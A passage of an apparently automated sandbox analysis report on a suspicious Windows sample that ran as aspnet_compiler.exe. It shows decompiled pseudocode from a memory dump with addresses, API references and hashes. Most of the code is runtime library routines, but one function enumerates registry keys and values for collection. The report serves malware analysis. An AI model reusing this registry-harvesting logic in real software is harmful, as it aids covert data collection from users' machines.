										goto L111;
									}
									__eflags = _t95 - 0x27;
									if(_t95 == 0x27) {
										_t110 = _t152 & 0x80000001;
										__eflags = _t110;
										if(__eflags < 0) {
											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
										}
										_t179 =  &(_t179[_t152]);
										if(__eflags == 0) {
											_t159 =  *_t179 & 0x0000ffff;
											__eflags = _t159;
											if(_t159 == 0) {
												goto L28;
											}
											_t174 = _v40;
											while(1) {
												__eflags =  *_t183;
												if( *_t183 == 0) {
													goto L113;
												}
												_t111 = 0x27;
												_t179 =  &(_t179[1]);
												__eflags = _t159 - _t111;
												if(_t159 == _t111) {
													goto L113;
												}
												 *( *_t174) = _t159;
												 *_t174 =  &(( *_t174)[0]);
												 *_t183 =  *_t183 - 1;
												_t159 =  *_t179 & 0x0000ffff;
												__eflags = _t159;
												if(_t159 != 0) {
													continue;
												}
												goto L113;
											}
										}
										continue;
									}
									__eflags = _t95 - 0x41;
									if(_t95 == 0x41) {
										L41:
										_t116 = E00452294(_t145, _t179, _t183, _t179, L"am/pm");
										__eflags = _t116;
										if(_t116 != 0) {
											_t117 = E00452294(_t145, _t179, _t183, _t179, L"a/p");
											_pop(_t153);
											__eflags = _t117;
											if(_t117 == 0) {
												_v28 =  &(_t179[3]);
											}
										} else {
											_t153 =  &(_t179[5]);
											_v28 =  &(_t179[5]);
										}
										_push(0x70);
										goto L111;
									}
									__eflags = _t95 - 0x48;
									if(_t95 == 0x48) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L55:
											_push(0x48);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L55;
										}
										goto L108;
									}
									__eflags = _t95 - 0x4d;
									if(_t95 == 0x4d) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L50:
											_push(0x6d);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L50;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x62);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x42);
										goto L111;
									}
									__eflags = _t95 - 0x61;
									if(_t95 != 0x61) {
										goto L108;
									}
									goto L41;
								}
								goto L28;
							}
							_t203 = _v33;
							if(_v33 == 0) {
								_t133 = E004470EB(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
							} else {
								_t133 = E0044722D(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
							}
							_t181 = _t184;
							_t177 = _t133 - 1;
							if(_t177 <= 0) {
								L27:
								E00434713(_t184);
								goto L28;
							} else {
								_t148 = _v32;
								_t185 = _v40;
								while( *_t148 > 0) {
									_t135 =  *_t181;
									_t181 = _t181 + 2;
									 *( *_t185) = _t135;
									 *_t185 =  &(( *_t185)[0]);
									 *_t148 =  *_t148 - 1;
									_t177 = _t177 - 1;
									if(_t177 > 0) {
										continue;
									}
									break;
								}
								_t184 = _v28;
								goto L27;
							}
						}
						asm("sbb eax, eax");
						_t137 = _t129 & _t175 + 0x00000008;
						_t165 = _t175 + 8;
						if((_t129 & _t175 + 0x00000008) > 0x400) {
							__eflags = _t175 - _t165;
							asm("sbb eax, eax");
							_t186 = E00444A38(_t165, _t137 & _t165);
							_v28 = _t186;
							_pop(_t165);
							__eflags = _t186;
							if(__eflags == 0) {
								goto L30;
							}
							 *_t186 = 0xdddd;
							L14:
							_t184 = _t186 + 8;
							goto L18;
						}
						asm("sbb eax, eax");
						E00455A90();
						_t186 = _t188;
						_v28 = _t186;
						if(_t186 == 0) {
							goto L30;
						}
						 *_t186 = 0xcccc;
						goto L14;
					}
				}
			}
































































                0x00445df1
                0x00445df9
                0x00445e00
                0x00445e06
                0x00445e09
                0x00445e10
                0x00445e13
                0x00445e19
                0x00445e1c
                0x00445e20
                0x00445e23
                0x00445e27
                0x00445e2a
                0x00445e41
                0x00445e2c
                0x00445e2f
                0x00445e39
                0x00445e31
                0x00445e31
                0x00445e31
                0x00445e2f
                0x00445e4e
                0x00000000
                0x00445e54
                0x00445e5d
                0x00445e64
                0x00445e6e
                0x00445e71
                0x00445e79
                0x00445e81
                0x00445e89
                0x00445e90
                0x00445e96
                0x00445e9d
                0x00445e9f
                0x00445eb5
                0x00445ec3
                0x00445ea1
                0x00445eae
                0x00445eae
                0x00445ec8
                0x00445ecc
                0x00000000
                0x00445ed2
                0x00445ed2
                0x00445ed5
                0x00445eda
                0x00445ede
                0x00445f38
                0x00445f38
                0x00445f3a
                0x00445f3a
                0x00445f3f
                0x00445fbf
                0x00445fc1
                0x00445fc6
                0x0044623d
                0x0044623d
                0x0044623d
                0x00446240
                0x00446243
                0x00000000
                0x00000000
                0x00445fcf
                0x00445fd2
                0x00445fa9
                0x00445fab
                0x00445fbe
                0x00445fbe
                0x00445fd4
                0x00445fd8
                0x00445fd8
                0x00445fda
                0x00445fdd
                0x00445fdf
                0x00445fe2
                0x00445fe2
                0x00445fe5
                0x00445fe6
                0x00445fe6
                0x00445feb
                0x00445fee
                0x00445ff1
                0x00445ff4
                0x00445ff7
                0x0044612c
                0x0044612c
                0x0044612f
                0x004461fc
                0x004461fc
                0x004461ff
                0x00446218
                0x0044621c
                0x0044621c
                0x0044621e
                0x0044621e
                0x0044622b
                0x0044622e
                0x00446233
                0x00446236
                0x00446238
                0x00446253
                0x00000000
                0x00446259
                0x0044623a
                0x0044623a
                0x00000000
                0x0044623a
                0x00446201
                0x00446201
                0x00446204
                0x00000000
                0x00000000
                0x00446206
                0x00446206
                0x00446209
                0x0044620e
                0x00446211
                0x00446214
                0x00000000
                0x00446214
                0x00446135
                0x00446135
                0x00446138
                0x004461e8
                0x004461e8
                0x004461eb
                0x004461f4
                0x004461f8
                0x004461f8
                0x00000000
                0x004461f8
                0x004461ed
                0x004461ed
                0x004461f0
                0x00000000
                0x00000000
                0x00000000
                0x004461f2
                0x0044613e
                0x0044613e
                0x00446141
                0x004461d4
                0x004461d4
                0x004461d7
                0x004461e0
                0x004461e4
                0x004461e4
                0x00000000
                0x004461e4
                0x004461d9
                0x004461d9
                0x004461dc
                0x00000000
                0x00000000
                0x00000000
                0x004461de
                0x00446147
                0x00446147
                0x0044614a
                0x00446173
                0x00446176
                0x0044617a
                0x00446184
                0x0044617c
                0x0044617c
                0x0044617c
                0x0044618a
                0x0044618d
                0x004461a9
                0x004461a9
                0x004461ac
                0x004461af
                0x00000000
                0x00000000
                0x004461b5
                0x004461b8
                0x004461b8
                0x004461bb
                0x00000000
                0x00000000
                0x004461bf
                0x004461c2
                0x004461c5
                0x004461c8
                0x004461ca
                0x004461cd
                0x004461d0
                0x00000000
                0x00000000
                0x00000000
                0x004461d2
                0x0044618f
                0x0044618f
                0x00446192
                0x00000000
                0x00000000
                0x00446194
                0x0044619c
                0x0044619f
                0x004461a2
                0x004461a2
                0x00000000
                0x0044618d
                0x0044614c
                0x0044614f
                0x00000000
                0x00000000
                0x00446156
                0x00446156
                0x00446159
                0x0044616c
                0x00000000
                0x0044616c
                0x0044615c
                0x0044615c
                0x0044615f
                0x00000000
                0x00000000
                0x00446165
                0x00000000
                0x00446165
                0x00445ffd
                0x004460fb
                0x004460fb
                0x004460fe
                0x00446121
                0x00446125
                0x00446125
                0x00000000
                0x00446125
                0x00446100
                0x00446100
                0x00446103
                0x00000000
                0x00000000
                0x00446105
                0x00446105
                0x00446108
                0x0044611a
                0x00000000
                0x0044611a
                0x0044610a
                0x0044610a
                0x0044610d
                0x00000000
                0x00000000
                0x00446113
                0x00000000
                0x00446113
                0x00446003
                0x00446006
                0x004460a8
                0x004460a8
                0x004460ad
                0x004460b3
                0x004460b3
                0x004460b4
                0x004460b7
                0x004460bd
                0x004460c0
                0x004460c3
                0x00000000
                0x00000000
                0x004460c9
                0x004460cc
                0x004460cc
                0x004460cf
                0x00000000
                0x00000000
                0x004460d7
                0x004460d8
                0x004460db
                0x004460de
                0x00000000
                0x00000000
                0x004460e6
                0x004460e9
                0x004460ec
                0x004460ee
                0x004460f1
                0x004460f4
                0x00000000
                0x00000000
                0x00000000
                0x004460f6
                0x004460cc
                0x00000000
                0x004460b7
                0x0044600c
                0x0044600f
                0x00446024
                0x0044602a
                0x00446031
                0x00446033
                0x0044608e
                0x00446094
                0x00446095
                0x00446097
                0x0044609c
                0x0044609c
                0x00446035
                0x00446035
                0x00446038
                0x00446038
                0x0044609f
                0x00000000
                0x0044609f
                0x00446011
                0x00446014
                0x0044606e
                0x0044606e
                0x00446071
                0x0044607d
                0x00446081
                0x00446081
                0x00000000
                0x00446081
                0x00446073
                0x00446073
                0x00446076
                0x00000000
                0x00000000
                0x00000000
                0x00446078
                0x00446016
                0x00446019
                0x0044603d
                0x0044603d
                0x00446040
                0x00446063
                0x00446067
                0x00446067
                0x00000000
                0x00446067
                0x00446042
                0x00446042
                0x00446045
                0x00000000
                0x00000000
                0x00446047
                0x00446047
                0x0044604a
                0x0044605c
                0x00000000
                0x0044605c
                0x0044604c
                0x0044604c
                0x0044604f
                0x00000000
                0x00000000
                0x00446055
                0x00000000
                0x00446055
                0x0044601b
                0x0044601e
                0x00000000
                0x00000000
                0x00000000
                0x0044601e
                0x00000000
                0x00446249
                0x00445f41
                0x00445f48
                0x00445f71
                0x00445f4a
                0x00445f59
                0x00445f59
                0x00445f78
                0x00445f7a
                0x00445f7d
                0x00445fa2
                0x00445fa3
                0x00000000
                0x00445f7f
                0x00445f7f
                0x00445f82
                0x00445f85
                0x00445f8c
                0x00445f8f
                0x00445f92
                0x00445f95
                0x00445f98
                0x00445f9a
                0x00445f9d
                0x00000000
                0x00000000
                0x00000000
                0x00445f9d
                0x00445f9f
                0x00000000
                0x00445f9f
                0x00445f7d
                0x00445ee5
                0x00445ee7
                0x00445ee9
                0x00445ef1
                0x00445f16
                0x00445f18
                0x00445f22
                0x00445f24
                0x00445f27
                0x00445f28
                0x00445f2a
                0x00000000
                0x00000000
                0x00445f30
                0x00445f11
                0x00445f11
                0x00000000
                0x00445f11
                0x00445ef5
                0x00445ef9
                0x00445efe
                0x00445f00
                0x00445f05
                0x00000000
                0x00000000
                0x00445f0b
                0x00000000
                0x00445f0b
                0x00445ecc

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: __freea$__alloca_probe_16_free
                • String ID: a/p$am/pm$hcD
                • API String ID: 2936374016-190199888
                • Opcode ID: bd0339a27ff2434fa59acf591c1612c68bf84e0e4e21ba565acc10f644ef9374
                • Instruction ID: 32e67ee006756031a0b78f425dd56af27fcec1da6a44ec8361004faafc6abf4c
                • Opcode Fuzzy Hash: bd0339a27ff2434fa59acf591c1612c68bf84e0e4e21ba565acc10f644ef9374
                • Instruction Fuzzy Hash: A9D1D231900205ABFB249FA8C955ABBB7B0FF06300F25419BE941AB342D77D9D81CB5B
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044F2A5 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E0044F2A5(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E004443F4(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E00444A38(0, 4);
						_t127 = 0;
						_v12 = _t132;
						E00445002(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x46f188; // 0x46f180
								 *_t133 = _t57;
								_t58 =  *0x46f18c; // 0x47065c
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x46f190; // 0x47065c
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x46f1b8; // 0x46f184
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x46f1bc; // 0x470660
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E00444A38(_t107, 4);
							_v20 = _t134;
							E00445002(0);
							if(_t134 == 0) {
								L11:
								E00445002(_v8);
								E00445002(_v12);
								return _v16;
							}
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t135 = E004516F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
							_t136 = _t135 | E004516F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
							_v16 = _v8 + 8;
							_t137 = _t136 | E004516F4(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
							_t138 = _t137 | E004516F4(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
							if((E004516F4(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E0044F23C(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						E00445002(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x46f188;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							E00445002( *((intOrPtr*)(_t100 + 0x7c)));
							E00445002( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}



































                0x0044f2a5
                0x0044f2ae
                0x0044f2b5
                0x0044f2b8
                0x0044f2c1
                0x0044f2e0
                0x0044f2e3
                0x0044f2e8
                0x0044f2ef
                0x0044f302
                0x0044f303
                0x0044f30c
                0x0044f30e
                0x0044f311
                0x0044f314
                0x0044f31a
                0x0044f31d
                0x0044f330
                0x0044f338
                0x0044f492
                0x0044f495
                0x0044f49a
                0x0044f49c
                0x0044f4a1
                0x0044f4a4
                0x0044f4a9
                0x0044f4ac
                0x0044f4b1
                0x0044f4b4
                0x0044f4b9
                0x0044f422
                0x0044f428
                0x0044f42c
                0x0044f42e
                0x0044f42e
                0x00000000
                0x0044f42c
                0x0044f345
                0x0044f348
                0x0044f34b
                0x0044f354
                0x0044f3e9
                0x0044f3ec
                0x0044f3f5
                0x00000000
                0x0044f3fe
                0x0044f35d
                0x0044f362
                0x0044f376
                0x0044f38a
                0x0044f396
                0x0044f3a4
                0x0044f3be
                0x0044f3da
                0x0044f404
                0x0044f417
                0x0044f408
                0x0044f40c
                0x0044f47f
                0x00000000
                0x00000000
                0x0044f481
                0x0044f483
                0x0044f486
                0x0044f488
                0x0044f48b
                0x0044f412
                0x0044f414
                0x0044f416
                0x0044f416
                0x0044f416
                0x0044f40c
                0x0044f41c
                0x0044f41f
                0x00000000
                0x0044f41f
                0x0044f3df
                0x0044f3e4
                0x00000000
                0x0044f3e8
                0x0044f322
                0x00000000
                0x0044f32a
                0x00000000
                0x0044f2cb
                0x0044f2cb
                0x0044f2cd
                0x0044f2d0
                0x0044f430
                0x0044f430
                0x0044f438
                0x0044f43a
                0x0044f43a
                0x0044f442
                0x0044f447
                0x0044f44b
                0x0044f450
                0x0044f45b
                0x0044f461
                0x0044f44b
                0x0044f465
                0x0044f46a
                0x0044f470
                0x00000000
                0x0044f470

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: e0708bc5a0d4a9f06ec679f0788951a62912216038da8a366d77298fca44e087
                • Instruction ID: 121fa3ad2d8a90f2dd1ed919a7657a0be01bb40abeb4b2edb7d8cd7f10ddde60
                • Opcode Fuzzy Hash: e0708bc5a0d4a9f06ec679f0788951a62912216038da8a366d77298fca44e087
                • Instruction Fuzzy Hash: D8610075900205AFEB20CF69C842B9FBBF4EF15724F14407BE844EB242EB749D468B98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00412D3D Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E00412D3D(void* __ecx, short* __edx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				int _v76;
				struct _FILETIME _v84;
				void* _v95;
				char _v96;
				char _v108;
				char _v132;
				char _v156;
				short _v668;
				short _v1188;
				char _v11188;
				short _v43956;
				void* __ebx;
				void* __edi;
				void* __ebp;
				int _t72;
				long _t73;
				void* _t93;
				long _t103;
				void* _t104;
				void* _t110;
				void* _t140;
				int _t144;
				int _t146;
				void* _t147;
				void* _t148;
				void* _t149;

				_t137 = __edx;
				_t112 = __ecx;
				E00455FB0();
				_push(_t140);
				_t144 = 0;
				_t110 = __ecx;
				E00435760(_t140,  &_v1188, 0, 0x208);
				_t149 = _t148 + 0xc;
				_v24 = 0x104;
				_v8 = 0;
				_v12 = 0x3fff;
				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
				_t72 = _v8;
				if(_t72 != 0 && _t72 != 0) {
					do {
						_v28 = 0xff;
						_t103 = RegEnumKeyExW(_t110, _t144,  &_v668,  &_v28, 0, 0, 0,  &_v84);
						_t152 = _t103;
						if(_t103 == 0) {
							_t104 = E0040415E(_t110,  &_v56, _t137, _t147, "\n");
							_t137 =  &_v668;
							E0040323D(E004042DC(_t110,  &_v108,  &_v668, _t147, _t152, _t104));
							E00401EE9();
							_t112 =  &_v56;
							E00401EE9();
						}
						_t144 = _t144 + 1;
					} while (_t144 < _v8);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					_t146 = 0;
					if(_t73 != 0) {
						do {
							_v96 = 0;
							_v16 = 0x2710;
							asm("stosd");
							_v12 = 0x3fff;
							asm("stosd");
							asm("stosw");
							asm("stosb");
							_v43956 = 0;
							_t73 = RegEnumValueW(_t110, _t146,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
							_t156 = _t73;
							if(_t73 == 0) {
								E00440751(_t112, _v32,  &_v96, 0xa);
								_t149 = _t149 + 0xc;
								E0040323D(E004042DC(_t110,  &_v56,  &_v43956, _t147, _t156, E0040415E(_t110,  &_v132, _t137, _t147, "\n")));
								E00401EE9();
								E00401EE9();
								L00403356(E004052DD(_t110,  &_v132,  &_v96, _t147, _t156, E00402073(_t110,  &_v56,  &_v43956, _t147, "\n")));
								E00401FB8();
								E00401FB8();
								_t93 = E00402073(_t110,  &_v156,  &_v96, _t147, "[regsplt]");
								_t137 = E00402097(_t110,  &_v56,  &_v96, _t147, _t156,  &_v11188, _v16);
								L00403356(E00402E81( &_v132, _t95, _t93));
								E00401FB8();
								E00401FB8();
								_t112 =  &_v156;
								_t73 = E00401FB8();
							}
							_t146 = _t146 + 1;
						} while (_t146 < _v20);
					}
				}
				return _t73;
			}









































                0x00412d3d
                0x00412d3d
                0x00412d45
                0x00412d4c
                0x00412d52
                0x00412d5c
                0x00412d5e
                0x00412d63
                0x00412d66
                0x00412d70
                0x00412d73
                0x00412da4
                0x00412daa
                0x00412daf
                0x00412db5
                0x00412db8
                0x00412dd3
                0x00412dd9
                0x00412ddb
                0x00412de5
                0x00412deb
                0x00412e00
                0x00412e08
                0x00412e0d
                0x00412e10
                0x00412e10
                0x00412e15
                0x00412e16
                0x00412db5
                0x00412e1b
                0x00412e20
                0x00412e26
                0x00412e2a
                0x00412e30
                0x00412e32
                0x00412e39
                0x00412e40
                0x00412e41
                0x00412e48
                0x00412e49
                0x00412e4b
                0x00412e4e
                0x00412e73
                0x00412e79
                0x00412e7b
                0x00412e8a
                0x00412e8f
                0x00412eb5
                0x00412ebd
                0x00412ec5
                0x00412eea
                0x00412ef2
                0x00412efa
                0x00412f0a
                0x00412f22
                0x00412f33
                0x00412f3b
                0x00412f43
                0x00412f48
                0x00412f4e
                0x00412f4e
                0x00412f53
                0x00412f54
                0x00412e30
                0x00412e2a
                0x00412f63

                APIs
                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00412DA4
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00412DD3
                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00412E73
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Enum$InfoQueryValue
                • String ID: 4G$84G$[regsplt]
                • API String ID: 3554306468-2898483682
                • Opcode ID: 7accb946cdf32411af8abb3756d89806eb3bfd201c9d9051f15644bed99baf95
                • Instruction ID: cf1d04cbe3be26fdb60a522ae5fe91f3eacc00445e23186f7e28dbfa0a80019f
                • Opcode Fuzzy Hash: 7accb946cdf32411af8abb3756d89806eb3bfd201c9d9051f15644bed99baf95
                • Instruction Fuzzy Hash: FA512B71900219AADB10EB91DD85EEFB7BCAF04304F50017AE505F2191EF74AB49CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0045551A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 94%
                			E0045551A(signed int __edx, intOrPtr _a4, intOrPtr _a8, char _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E0044AB6C(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E0044AB6C(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t5 =  &_a12; // 0x454445
					_t20 =  *_t5;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t13 =  &_v20; // 0x454445
							_t21 = E0044AB6C(_t59,  *_t13, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(E0043EEAD()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t14 =  &_a12; // 0x454445
							_t25 = E0044AB6C(_t59, _a8,  *_t14, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(E0044ED18(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(E0043EEAD())) = 0xd;
							_t30 = E0043EE9A();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E004443F4(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E00442C00(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = E0044A2B7(_t46, _t59, _t63, _t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E0043EE9A();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(E0043EEAD())) = 0xd;
										}
										L23:
										_t38 = E0043EEAD();
										E00445002(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E00442C00(_t56, _t59, _v12);
							E00445002(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(E0043EEAD())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(E0043EEAD()));
			}
































                0x0045551a
                0x00455524
                0x00455527
                0x0045552e
                0x00455535
                0x0045553a
                0x0045553d
                0x00455543
                0x00455556
                0x0045555d
                0x00455560
                0x00455562
                0x00455565
                0x00000000
                0x00000000
                0x0045556b
                0x0045556b
                0x0045556d
                0x0045556d
                0x00455570
                0x00455572
                0x00455575
                0x00455653
                0x00455653
                0x00455655
                0x0045560c
                0x00455610
                0x00455614
                0x0045561e
                0x00455621
                0x004556a2
                0x004556a2
                0x004556a4
                0x00000000
                0x004556a4
                0x00455623
                0x00455628
                0x00000000
                0x00455628
                0x00455657
                0x0045565d
                0x0045565e
                0x00455665
                0x0045566c
                0x0045566f
                0x00455672
                0x00000000
                0x00000000
                0x0045567c
                0x00455682
                0x00455684
                0x00000000
                0x00000000
                0x0045568b
                0x00455691
                0x0045569e
                0x00000000
                0x0045569e
                0x00455659
                0x0045565b
                0x00000000
                0x00000000
                0x00000000
                0x0045565b
                0x0045557b
                0x00455585
                0x00455591
                0x00455594
                0x00455595
                0x00455597
                0x004555b5
                0x004555b8
                0x004555bb
                0x004555bc
                0x004555bc
                0x004555be
                0x004555d1
                0x004555d1
                0x004555d3
                0x004555d6
                0x004555db
                0x004555de
                0x004555e1
                0x0045562c
                0x00455631
                0x00455634
                0x0045563b
                0x0045563b
                0x00455641
                0x00455641
                0x00455649
                0x0045564f
                0x00000000
                0x0045564f
                0x004555e3
                0x004555e4
                0x004555e6
                0x004555e9
                0x004555eb
                0x004555ee
                0x004555f0
                0x004555ca
                0x004555ca
                0x00000000
                0x004555ca
                0x004555f2
                0x00000000
                0x00000000
                0x00000000
                0x004555f2
                0x004555c0
                0x00000000
                0x00000000
                0x004555c2
                0x004555c8
                0x00000000
                0x00000000
                0x00000000
                0x004555f4
                0x004555f4
                0x004555f4
                0x004555fc
                0x00455602
                0x00455607
                0x0045560a
                0x0045560a
                0x00000000
